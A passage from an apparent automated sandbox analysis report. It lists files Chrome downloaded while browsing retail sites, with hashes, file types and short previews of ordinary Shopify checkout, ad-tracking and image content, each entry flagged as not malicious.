                                                                                                                                                                                    SHA-256:A2C376481BA67559433EBDB9F6E3773DB7AF20E7EFFA2D5B39BAE4A29868BF96
                                                                                                                                                                                    SHA-512:FD5ECAFC2CD4C391458B5350B05D3846AC4B19BC51864B1E1C08117F913F3215506D8C46F1D4BF78C8638FCAD7EAA2452080CA9AC901F96C47FCF6A67980F1E4
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/PickupPointCarrierLogo.Dit2gzD9.js
                                                                                                                                                                                    Preview:import{bJ as P,a as t,k as A,e as B,A as l,bK as E,q as U,y as M,ae as O,bL as z,ab as G,V as J,a8 as N,I as V}from"./app.DfgMZONA.js";const W=P(function(s,r){return t("iframe",{...s,ref:r})}),X={Map:"veGnT"},q="https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/current-location-pin.BapvrdeV.svg",K="https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/destination-location-pin.DwoZMqg_.svg",p="shopify_sandboxed_message:";function H(e){if(!(typeof e!="string"||!e.startsWith(p)))try{return JSON.parse(e.replace(p,""))}catch{}}function Q(e){return`${p}${JSON.stringify(e)}`}function x(e){return e?.map(s=>{switch(s.type){case"current":return{...s,image:q};case"destination":return{...s,image:K};default:return s}})}const j=200;function ke({className:e,markers:s,options:r,title:_,mapId:F,blockSize:u=j,onMarkerSelect:f,handleBoundsChanged:m,handleCenterChanged:h,handleClick:d,handleDoubleClick:g,handleDrag:b,handleZoomChanged:T,handleDragEnd:R}){const I=A(),C=B
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):35978
                                                                                                                                                                                    Entropy (8bit):4.9214403502286475
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:kKzXbKOIEkFaXHXdXGXO523FkcKJROfi6VVeqOO:kKzXbfIbaXHXdXGXO523KcKJROfi6VV9
                                                                                                                                                                                    MD5:CD97A8EA77B570DC426DE8111060CA4D
                                                                                                                                                                                    SHA1:976C508F2F407AE72C2E7DE92F045D62EB25AA1D
                                                                                                                                                                                    SHA-256:AA77E2479AC8572217DD35D3A2C9D283E06E2D831B2F3B7BCA4AF24683FEFAF3
                                                                                                                                                                                    SHA-512:2B7A0103474EABC36780126CAAB362AC56DB9337CF5E4367E0B0A84DE7C0015E1CB6DE35D968106E2124DF0419E36996B4123FA847B6608B2D84D4102DDD7B14
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/extensions/162002f6-08d7-4b02-b4ce-48655f8f0c90/kite-free-gift-discounts-409/assets/shippingDiscount.js
                                                                                                                                                                                    Preview:console.log("inside shippingDiscount.js");..let gfgShippingDiscountV2 = {. state: {. isFirstRenderForShippingDiscount: true,. productFound: {},. productVariantFrount: {},. collectionFound: {},. appBlockKeyMap: {. tBarHeadingFontSize: "titleBarHeadingFontSize",. tBarHeadingFontWt: "titleBarHeadingFontWeight",. tBarSubHeadingFontSize: "titleBarSubHeadingFontSize",. tBarSubHeadingFontWt: "titleBarSubHeadingFontWeight",. tBarTextColor: "titleBarTextColor",. tBarBackgroundColor: "titleBarBackgroundColor",. widgetBodyFontSize: "widgetBodyFontSize",. widgetBodyFontWt: "widgetBodyFontWeight",. widgetBodyBackgroundColor: "widgetBodyBackgroundColor",. widgetBodyBorderColor: "widgetBodyBorderColor",. },. },. init: function () {. try {. let settings = gfg.settings;. let _shippingDiscountData = settings.shippingDiscount;.. const page_type = gfg.f.getPageType();. if (page_type === "product") {. gfgSh
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (7432)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7672
                                                                                                                                                                                    Entropy (8bit):5.101475044894889
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:j9qm2ODPRGMqUuN4ql5VhVMVYZSg+T++apH+gZtUaxwoAdIW+avLpxxjO+:pqbQchnnJZeoAdIs1O+
                                                                                                                                                                                    MD5:1D545B449977BC9428CFBC2FE8636252
                                                                                                                                                                                    SHA1:2EFC91952A7283FCB476AEB53500FBC44CC305F6
                                                                                                                                                                                    SHA-256:EE3207E4DA90DE4A87A385182B71AF838099EB532232A764FDE7A660C786C28C
                                                                                                                                                                                    SHA-512:9331416B06932E36745B7C9EE68E49B592E35C81F283579F8CE70BD83DD5EC162E1D7F800E0F7DA877C1FEBDD6B76976244BFD0F90DEDE50173193BF7F42622C
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/index.2zVq00Bx.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-Captcha.BHYA0XyW.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","ShopPayCaptcha.CCES6A-V.js","assets/Captcha.BHCCpQV5.css"])))=>i.map(i=>d[i]);.import{e as t,T as n,bG as o,bH as s,bI as i,_ as d}from"./app.DfgMZONA.js";const _=new Map([["INSUFFICIENT_FUNDS","insufficient_funds"],["INVALID_PAYMENT_METHOD","cannot_verify"],["FUNDING_ERROR","processing_error"],["CANCELED_PAYPAL_BILLING_AGREEMENT","processing_error"],["TOKEN_EXPIRED","processing_error"],["INVALID_TOKEN","processing_error"],["UNILATERAL_AUTH_ERROR","processing_error"],["THIRD_PARTY_INTERNAL_ERROR","processing_error"],["AUTHORIZATION_ERROR","processing_error"],["INVALID_CURRENCY","processing_error"],["INVALID_ITEM_TOTAL","processing_error"],["UNPROCESSABLE_TRANSACTION","processing_error"],["INVOICE_ALREADY_PAID","processing_error"],["INCORRECT_NUMBER","cannot_verify"],["INCORRECT_CVC","cannot_verify"],["INCORRECT_ZIP","cannot_verify"],["INCORRECT_ADDRESS",
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):2516
                                                                                                                                                                                    Entropy (8bit):7.355904215659091
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:80Il/Xflj0XEbrMpFCjOUtmrguKQHmB1c+uIrZ85oyZylYBNM1zmO:rIl/XpNrMpFCjObjmjc+E50lEN6
                                                                                                                                                                                    MD5:58ED8644D8B38D3093CEE1EB436137B3
                                                                                                                                                                                    SHA1:59B6E8C5876EE651082E65A580DDC47B0074C366
                                                                                                                                                                                    SHA-256:5D296A2252ADDFDF0B0889ECADA682289BEBE2590437681A129197C39A644FBA
                                                                                                                                                                                    SHA-512:2AF7DD9C8CC2935CA18DE49BC9245E58098670A351C5710D0F35AEAC1D6830144930654328C648EAA05A62171691AB93193E4939CB12D50589D17FF1998EB082
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_76975d48-cd33-4366-8017-cf16527e0cc5.jpg?v=1729322906&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 <...P....*P.P.>1..C.!!...\ ....d....*...c...1~w:g......>.7>....Yb.7...y.......].>3.;.a........1..y././.=....f............<..b$.!s.W..`.de..@|z......U...8k.FM.).1q..w.$.........6... .;.S..ki@u..`H.....O.|....Lr..M M*./U.w...GV^..R.J(....$.F.;.1.. .....z...._O..C.....O>........Y....b.r..].......[a:......)Sw..WU.[T.....Yx..,m.d....|.}`/......~2.O.J.<.Q...y.T"<S$.TLW.W..D.<..xD.....F.0...Z.@.{G..@G./..lu..ib..7..skk......t...W..K.N....l0....m..... ..Z.CD..Kp../..@..7.....H...z.wl...%.ik.Q..(.3....y-y....{e...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):246
                                                                                                                                                                                    Entropy (8bit):4.744852095255021
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6:sTTR1DnNxxl98gzqsDPWEgcSKgvXa9EwMTRvcSEKv:sJ1DNxeodoTKgvgoZThv
                                                                                                                                                                                    MD5:1E05A81C6647B91CC227591AD7584653
                                                                                                                                                                                    SHA1:B3401479BE40B77BAA07526B9B721B297F1DD7F9
                                                                                                                                                                                    SHA-256:3A2580842B709E881EA6C57395AB78749A69F573998A35EA86175DB63755AC3A
                                                                                                                                                                                    SHA-512:9BC5BC59EA942DF584AD8CB2B04F681FEA36A2465266E8B2E2F242F0478E2E29335ABC5F95C1316F55993707EEE29A3CEA4160DAE4C427C09B08834CEFC1C51F
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/PayButtonSection.DF7trkKf.css
                                                                                                                                                                                    Preview:.zdTmQ{position:relative;padding-bottom:env(safe-area-inset-bottom);margin:0;height:109px;overflow:hidden;border-top:1px solid var(--x-default-color-border);box-shadow:var(--x-box-shadow-small);background-color:var(--x-default-color-background)}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (61318)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):73266
                                                                                                                                                                                    Entropy (8bit):5.460270197099864
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:qYWvuPAadRXadFil26aAn7t2npMvCm+uGYD8BQrEWvyElVlqZw4aN8uDvz6TCLI/:qYW2Pj5yO7t2ACRg8398gZrSdO
                                                                                                                                                                                    MD5:009FCFD853277AF919BFE8917FF631D1
                                                                                                                                                                                    SHA1:1E54268802759003351B658A00E268CB3132A547
                                                                                                                                                                                    SHA-256:DA0D1B65AD352624594A38CA5E2CB2179F2DEB2C7C2F8233BCBF52E47531FCB7
                                                                                                                                                                                    SHA-512:07A2DEB0F643A5D177BD234B437E86381F76961AA8D24AC60FFFDBAC19D9CDFF99BDF9D46C9A947D600C94F56B376A4F130D47AFFE5A9660E2554A0C0FA4E9AC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.zulily.com/wpm@d9f539ffw0e1474c4pae8b6d69m179c86ad/custom/web-pixel-98566460@6/sandbox/modern/
                                                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <meta charset="utf-8">. <title>Web Pixels Manager Sandbox</title>. <script type="text/javascript">. (()=>{var e={3482:function(e,t,r){var n,i,o;!function(a,s){"use strict";i=[r(3550)],void 0===(o="function"==typeof(n=function(e){var t=/(^|@)\S+:\d+/,r=/^\s*at .*(\S+:\d+|\(native\))/m,n=/^(eval@)?(\[native code])?$/;return{parse:function(e){if(void 0!==e.stacktrace||void 0!==e["opera#sourceloc"])return this.parseOpera(e);if(e.stack&&e.stack.match(r))return this.parseV8OrIE(e);if(e.stack)return this.parseFFOrSafari(e);throw new Error("Cannot parse given Error object")},extractLocation:function(e){if(-1===e.indexOf(":"))return[e];var t=/(.+?)(?::(\d+))?(?::(\d+))?$/.exec(e.replace(/[()]/g,""));return[t[1],t[2]||void 0,t[3]||void 0]},parseV8OrIE:function(t){return t.stack.split("\n").filter((function(e){return!!e.match(r)}),this).map((function(t){t.indexOf("(eval ")>-1&&(t=t.replace(/eval code/g,"eval").replace(/(\(eval at [^()]*)|(,.*$)/g,""));va
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7346), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7346
                                                                                                                                                                                    Entropy (8bit):5.660966985492151
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:yZyxg2cl8Bb/BhzBNYBgeB4kBKEB1qB3DKnBmIQBIZlBuFB+GBT9BnyBb3:y4xg2cl89/PzHYWe2kwEvqFKnEIQe3gm
                                                                                                                                                                                    MD5:563E013C0DE96A581F202697CDB20280
                                                                                                                                                                                    SHA1:E25652E43BC84A0B2C27854ED25A5B3449B89940
                                                                                                                                                                                    SHA-256:05ED5C2A3C5151E567D1B463CB0E38EFADC3145709E39C1869A9582456441447
                                                                                                                                                                                    SHA-512:2DFC62B3A50BAADA2858DA20416FD6C125259C4F0E6F5D65ACB32449BDC3F0697D19ADC08B9EDA50F134C492CEF5B642E97BFDF9E4B0E6EC3CC7FCBFFE758313
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://td.doubleclick.net/td/rul/11435964337?random=1730294607467&cv=11&fst=1730294607467&fmt=3&bg=ffffff&guid=ON&async=1&gtm=45be4as0v9172781734z89176705627za201zb9176705627&gcd=13l3l3l3l1l1&dma=0&tag_exp=101533421~101823848~101878899~101878944~101925629&u_w=1280&u_h=1024&url=https%3A%2F%2Fwww.overstock.com%2Fcollections%2Ffurniture&ref=https%3A%2F%2Fwww.overstock.com%2F&top=https%3A%2F%2Fwww.overstock.com%2F&hn=www.googleadservices.com&frm=2&tiba=Furniture%20-%20Overstock&npa=0&pscdl=noapi&auid=164462539.1730294546&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B117.0.5938.149%7CNot%253BA%253DBrand%3B8.0.0.0%7CChromium%3B117.0.5938.149&uamb=0&uam=&uap=Windows&uapv=10.0.0&uaw=0&fledge=1&data=event%3Dview_item_list%3Bgoogle_business_vertical%3Dretail%3Bid%3D37549953-000-009%2C38726140-000-001%2C38600656-000-001%2C43111903-000-000%2C40807294-000-007%2C39849053-000-001%2C39242811-000-006%2C43468481-000-000%2C40296725-000-004%2C42763529-000-004%2C39018193-000-003%2C41755617-000-006%2C40757421-000-009%2C41458783-000-002%2C37534451-000-003%2C41570575-000-010%2C15945143-000-000%2C40844408-000-000%2C39663286-000-000%2C43058951-000-000%2C29686693-000-031%2C40744870-000-002%2C39242215-000-000%2C39849055-000-001%2C41677397-000-006%2C40226118-000-012%2C41070992-000-011%2C38878467-000-001%2C43376700-000-000%2C42094646-000-000%2C40224603-000-011%2C36963270-000-000%2C40239207-000-001%2C38624340-000-000%2C39624768-000-002%2C41292666-000-000%2C38493857-000-001%2C40949126-000-001%2C43740058-000-000%2C42794769-000-002%2C42847268-000-002%2C42135983-000-000%2C41523766-000-004%2C40896133-000-002%2C16352532-000-001%2C41728338-000-001%2C37534467-000-001%2C28327283-000-002%2C42130348-000-004%2C34955610-000-001
                                                                                                                                                                                    Preview:<html><head><meta http-equiv="origin-trial" content="Avh5Ny0XEFCyQ7+oNieXskUrqY8edUzL5/XrwKlGjARQHW4TFRK+jVd5HnDIpY20n5OLHfgU4ku7x48N3uhG/A0AAABxeyJvcmlnaW4iOiJodHRwczovL2RvdWJsZWNsaWNrLm5ldDo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0="></head><body><script>var ig_list={"interestGroups":[{"action":0,"expirationTimeInSeconds":15552000,"interestGroupAttributes":{"owner":"https://td.doubleclick.net","name":"4s164462539.1730294546","biddingLogicUrl":"https://td.doubleclick.net/td/bjs","dailyUpdateUrl":"https://td.doubleclick.net/td/update?ig_name=4s164462539.1730294546\u0026ig_key=1sNHMxNjQ0NjI1MzkuMTczMDI5NDU0Ng!2saA-BUA!3sAAptDV6c_tWD\u0026tag_eid=44800267","trustedBiddingSignalsUrl":"https://td.doubleclick.net/td/bts","trustedBiddingSignalsKeys":["1szSHUfQ!2saA-BUA!3sAAptDV6c_tWD","1i44800267"],"userBiddingSignals":[["8604994774","8605899945","8605118546","8604992644","8605117709","8605218413","8604357350","8526177074","86051
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, Unicode text, UTF-8 text, with very long lines (6761)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):7168
                                                                                                                                                                                    Entropy (8bit):5.41605270874171
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:jmhihxyeBacaiBynTRihA0pZ7zVZOvAalmLp7UXyJ6k1Pf8GGxexbNU64IG2lA3J:Ie5DYTRnW7BZxp7UXaR98GZJ4JM1t0
                                                                                                                                                                                    MD5:D1586B0EF966A5E187DB76B5C7893CB6
                                                                                                                                                                                    SHA1:EBD4316A4F39A96DDD27797D94376348C71A3F1B
                                                                                                                                                                                    SHA-256:7C044222EE5F647A451DC49E7AEC4AB6B148AF46FF1DA16A2B6A9F8C14C39F94
                                                                                                                                                                                    SHA-512:EEAE1391A0C27E3174FB9F75A6C045620EC662E5EDE304238EDC22A28C91D69299BB51CEEC3539752F2CE93AD4C4DAE84EA33A979AF84F203F43A8D96D596CC2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/useAmazonContact.ysZ2sjoF.js
                                                                                                                                                                                    Preview:const __vite__mapDeps=(i,m=__vite__mapDeps,d=(m.f||(m.f=["component-DeliveryMacros._c5_QvIi.js","app.DfgMZONA.js","assets/app.whj6cDzT.css","DeliveryMacro.DJg9JGLP.js","SubscriptionGroupLine.CD4J-c2w.js","SubscriptionPriceBreakdown.CxrCP-xw.js","assets/SubscriptionPriceBreakdown.Bqs0s4oM.css","StackedMerchandisePreview.JyjIicj-.js","assets/StackedMerchandisePreview._xnAOXmq.css"])))=>i.map(i=>d[i]);.import{bH as Me,bI as be,_ as Re,aj as b,e as f,a as e,a7 as ee,a8 as h,ab as R,aB as xe,aO as x,ar as ne,mL as Ae,an as ie,q as _,au as ke,av as Fe,cP as He,cR as te,qN as Ve,m as Be,J as we,dS as Ue,h as Q,at as se,di as qe,aP as ze,cc as X,lE as Ge,cZ as $e,kV as We,y as K,T as Ye,D as je,p as Je,dp as Qe,e_ as Xe,qO as Ke,aT as Ze,dn as en,aV as nn,qP as tn,aU as sn,az as oe,ce as N,aS as on,ae as rn,hf as an,aQ as ln,V as C,ak as dn,jj as cn,d_ as pn,fL as un,jr as hn,cS as yn,c0 as vn}from"./app.DfgMZONA.js";const Cn=Me({displayName:"DeliveryMacros",load:()=>be(()=>Re(()=>import("./co
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (5991)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):274908
                                                                                                                                                                                    Entropy (8bit):5.569846411085323
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3072:lQuwiztGbETravo1y055CptDY8/I8+yU/OUYhcDmKD0C8Gp/36l:BGbg+voPMYGUTx0C8Gp/3S
                                                                                                                                                                                    MD5:060B58B8B537CE50CF48054B744ABE39
                                                                                                                                                                                    SHA1:A275252A2592C6213D60087B0DA7F8DB82ACE783
                                                                                                                                                                                    SHA-256:3B6445025F41511AFAE8EB5F26675D1BF8BD1BF2EA22B7AE25E2FAB8A14F3C1B
                                                                                                                                                                                    SHA-512:0F546BF91ADFBAE9D6CF4B06B7AEA8B184593F264AC41BAEE777F8CD45E1E5ADD789F3663AD1FE7B1C9DBF1C2E2335F478BA713A281BE110E808F874D784A92D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:.// Copyright 2012 Google Inc. All rights reserved.. .(function(){..var data = {."resource": {. "version":"4",. . "macros":[{"function":"__e"}],. "tags":[{"function":"__ogt_auto_events","priority":21,"vtp_enableScroll":true,"vtp_enableOutboundClick":true,"vtp_enableDownload":true,"vtp_enableHistoryEvents":true,"vtp_enableForm":true,"vtp_enableVideo":true,"vtp_enablePageView":true,"tag_id":9},{"function":"__ogt_cross_domain","priority":21,"vtp_rules":["list","bedbathandbeyond\\.ca$","bedbathandbeyond\\.com$"],"tag_id":11},{"function":"__ogt_ads_datatos","priority":21,"vtp_instanceDestinationId":"AW-1069816607","tag_id":22},{"function":"__ogt_1p_data_v2","priority":11,"vtp_isAutoEnabled":true,"vtp_autoCollectExclusionSelectors":["list",["map","exclusionSelector",""]],"vtp_isEnabled":true,"vtp_cityType":"CSS_SELECTOR","vtp_manualEmailEnabled":false,"vtp_firstNameType":"CSS_SELECTOR","vtp_countryType":"CSS_SELECTOR","vtp_cityValue":"","vtp_emailType":"CSS_SELECTOR","vtp_regionType":"CS
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (11091), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):11094
                                                                                                                                                                                    Entropy (8bit):5.684677277432394
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:qAshXMRyW6VwXHUE/nByzKC3dcFPTive9/Wgu/NAPicGVBhyi9PfXNy:dshXMRyW73UynByN3m8vw/WF6oBhy0f8
                                                                                                                                                                                    MD5:76C4D444632EA88B42DC3E37C29F15E9
                                                                                                                                                                                    SHA1:ABA58DEB67FF3C2DE4551B0B1830162AE6FAD100
                                                                                                                                                                                    SHA-256:0E3AD3843FDE479133368BECD2044EFEE948B2BE7D91C90F89E677179A616F4B
                                                                                                                                                                                    SHA-512:9C4AB853A251726505229C4E2E5972F1AABFED1C1DFE61BD4E4BDC09CC68786F9551316B54768DFD2CC4C253370C73ECBC3E304B00C2931122615011E7EEE7A2
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:./* */try { eval('(function() {var qss="&cb="+Math.floor(99999999999*Math.random());try{qss+="&ref="+encodeURIComponent(document.referrer)}catch(e){}try{qss+="&sc_r="+encodeURIComponent(screen.width+"x"+screen.height)}catch(e){}try{qss+="&sc_d="+encodeURIComponent(screen.colorDepth.toString())}catch(e){}var callDis=function(e,t,n,o){function c(){callDisInternal(e,t,n,o)}"complete"===document.readyState?setTimeout(c):window.addEventListener?window.addEventListener("load",c,!1):window.attachEvent("onload",c)},disCalled=!1,callDisInternal=function(e,t,n,o){disCalled||(disCalled=!0,n=(n?"https:":"")+"//"+t+"/dis/dis.aspx",(t=document.createElement("iframe")).width=t.height="0",t.style.display="none",t.setAttribute("sandbox","allow-same-origin allow-scripts"),t.setAttribute("aria-hidden","true"),t.title="Criteo DIS iframe",void 0!==o&&""!==o&&(document.body.appendChild(t),null!=t.contentDocument)?(t.contentDocument.open(),t.contentDocument.write(o),t.contentDocument.close()):(t.src=(n+
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1078
                                                                                                                                                                                    Entropy (8bit):5.927921701892487
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:kETCIl/X2YlXWI2PUrAEfgHQG7nESF9MQBLKF:OIl/Xfl+MgvpF9MQo
                                                                                                                                                                                    MD5:2659F42DB1A060176C4AA052032ADBF3
                                                                                                                                                                                    SHA1:D9BB98A02AF56A50378389C88E5C32E2214D7CD4
                                                                                                                                                                                    SHA-256:657EC607B6644B7D88A08D9B6B278E94BEDEA0EE578C32BA1B5491D029B2D7B4
                                                                                                                                                                                    SHA-512:D7D89D3DB2ADCF480DB5422986F8122C13323E89ABF438BED541F63AB7030B0BB1B30616845266C8F072A42DF4046F6ABA68D9C4DF59ABCCC2F6EF54C20565DC
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_3535249d-4c6e-4452-b9be-a6b86e0fe65c.jpg?v=1729323113&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .........*P.P.>1..C.!..L.l ......}.x:...r.H.I|..."v.#k.....^...S.....F.).w|.k.;../..%..bf..x...i5..P....U..I...8...v....Z............<G|lu%..".y.~....W...k..w.DM..i...u.. .K.;._..D......(.!.CI.I#.S..N...c...b2C..:.7......Z...RB[E..._^.."Dd.+i.......Pl*..j...6..a/..l.C..^.-...s.68..W.......b.^..t3..*d.*R?0X}.5..8..5.L.....p.....#..A.q.pE*.<8..^d.h..=....sy...N....r.....#...Y.....F[.W..6p....EXIF....Exif..II*...........................V...........^...(.......................i.......f.......H.......H.......
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):73
                                                                                                                                                                                    Entropy (8bit):4.656191038630684
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:bR6WQRagDGLOIOSEWrqV:bkrRsCcE
                                                                                                                                                                                    MD5:C9D5D489A7792876CEF045A0477F3B32
                                                                                                                                                                                    SHA1:6891F6B08B0D7D4EF212450F32D97222E05260D8
                                                                                                                                                                                    SHA-256:760BAA3A18E50032F8447C212D774102B69CBE6E35F368DDC2F2A2C2428493FB
                                                                                                                                                                                    SHA-512:37CC9C850F410AB8309406F27E1F4231C4B952DEB828093C9F40C9E5D2459E725AEFC6084B5F45DE23DDD56E448141308AED37D57E1389582CA11671C8B14E1E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/assets/StockProblemsLineItemList.CxdIQKjw.css
                                                                                                                                                                                    Preview:.IDG1X{text-transform:var(--x-global-typography-letter-case, uppercase)}.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):129979
                                                                                                                                                                                    Entropy (8bit):5.262056499957794
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:1536:VyhOCvjwxJZzcXI6+jyXu4KaEV/gbXc20ZHLwD8EaBtrRyX1Z:VyhOC0x96ruNiXcvh0jyxRyXj
                                                                                                                                                                                    MD5:623DA2092AB9E81400D81FAD9017F0BA
                                                                                                                                                                                    SHA1:1C76F260E73E1229548D84EC1A8A3A2E8C09D056
                                                                                                                                                                                    SHA-256:8E89E1175A6145D737446D673FFA073F4C469C8FE3972F5287B1E7E9B241282B
                                                                                                                                                                                    SHA-512:D7934C8E66923FBC1E3783E58DCAACF6801E7B53028EBA45AA3983721F7E5469F3C92D6A9872E593C31DDC87CF8547CFDA950802A8EDD7D92576C7F078E6282D
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[774],{4448:function(e,t,n){var r=n(7294),l=n(6086),a=n(3840);function o(e){for(var t="https://reactjs.org/docs/error-decoder.html?invariant="+e,n=1;n<arguments.length;n++)t+="&args[]="+encodeURIComponent(arguments[n]);return"Minified React error #"+e+"; visit "+t+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings."}if(!r)throw Error(o(227));var u=new Set,i={};function s(e,t){c(e,t),c(e+"Capture",t)}function c(e,t){for(i[e]=t,e=0;e<t.length;e++)u.add(t[e])}var f=!("undefined"===typeof window||"undefined"===typeof window.document||"undefined"===typeof window.document.createElement),d=/^[:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF\uF900-\uFDCF\uFDF0-\uFFFD][:A-Z_a-z\u00C0-\u00D6\u00D8-\u00F6\u00F8-\u02FF\u0370-\u037D\u037F-\u1FFF\u200C-\u200D\u2070-\u218F\u2C00-\u2FEF\u3001-\uD7FF
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (24579), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24579
                                                                                                                                                                                    Entropy (8bit):5.447330328895334
